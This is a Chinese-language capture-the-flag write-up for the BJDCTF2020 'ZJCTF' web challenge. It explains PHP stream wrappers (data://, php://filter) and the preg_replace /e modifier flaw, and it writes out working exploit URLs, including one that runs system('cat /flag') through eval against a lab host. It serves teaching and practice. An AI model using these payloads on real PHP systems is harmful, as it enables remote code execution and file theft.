[BJDCTF2020]ZJCTF,不过如此 1

涉及:php的伪协议、preg_replace函数的漏洞和正则表达式的运用。

解题步骤

php 复制代码
<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>
  1. 看到file_get_contents,直接用date协议,错不了; 看到include 直接filter协议,错不了
    http://8774b3af-5438-42c6-94f2-cc07fd011005.node5.buuoj.cn:81?text=data://text/plain,I have a dream&file=php://filter/read=convert.base64-encode/resource=next.php

  2. 进行base64解码,得到

bash 复制代码
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
​
function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei', # 这里的正则表达式 通过/去切分,/() 和 /ei e模式是把子项当成php代码去执行,也就是说把传来的${getFlag()}当成代码去执行,i是把字符串变成大小写
        'strtolower("\\1")', # strtolower函数是把字符串变成小写,其实也就是\1,
		# 就比如这个pyload:/next.php?\S*=${getflag()}&cmd=system('cat /flag'); 第一子项就是${getflag},因为$str的值就是getflag();然后调用getflag函数。
		# 之所以用\S* 而不是.*是因为php会将传入的非法的参数名转成下滑线。
		#反向引用:对一个正则表达式模式或部分模式 两边添加圆括号 将导致相关匹配存储到一个临时缓冲区中,所捕获的每个子匹配都按照在正则表达式模式中从左到右出现的顺序存储。缓冲区编号从 1 开始,最多可存储 99 个捕获的子表达式。每个缓冲区都可以使用 '\n' 访问,其中 n 为一个标识特定缓冲区的一位或两位十进制数
        $str
    );
}
foreach($_GET as $re => $str) { # foreach会把$_GET请求的键和值 拿出来 如lh=cmd 则lh是键 cmd是值
    echo complex($re, $str). "\n";
}
function getFlag(){
    @eval($_GET['cmd']); # 这里执行cmd的内容 即 system('cat /flag')
}  
  1. 构造pyload:
bash 复制代码
http://8774b3af-5438-42c6-94f2-cc07fd011005.node5.buuoj.cn:81/next.php?\S*=${getflag()}&cmd=system('cat /flag');
相关推荐
安全系统学习8 小时前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
江苏思维驱动智能研究院有限公司11 小时前
Sophos 网络安全:全球领先的自适应安全解决方案提供商
网络·安全·web安全
浩浩测试一下18 小时前
渗透信息收集- Web应用漏洞与指纹信息收集以及情报收集
android·前端·安全·web安全·网络安全·安全架构
Fortinet_CHINA20 小时前
工业网络安全新范式——从风险可见性到量化防御的进化
安全·web安全
网安小白的进阶之路1 天前
A模块 系统与网络安全 第三门课 网络通信原理-3
网络·windows·安全·web安全·系统安全
HumanRisk1 天前
HumanRisk-自动化安全意识与合规教育平台方案
网络·安全·web安全·网络安全意识教育
安全系统学习1 天前
【网络安全】Mysql注入中锁机制
安全·web安全·网络安全·渗透测试·xss
缘友一世2 天前
网安系列【4】之OWASP与OWASP Top 10:Web安全入门指南
安全·web安全
安全系统学习2 天前
网络安全之SQL RCE漏洞
安全·web安全·网络安全·渗透测试
聚铭网络2 天前
案例精选 | 某省级税务局AI大数据日志审计中台应用实践
大数据·人工智能·web安全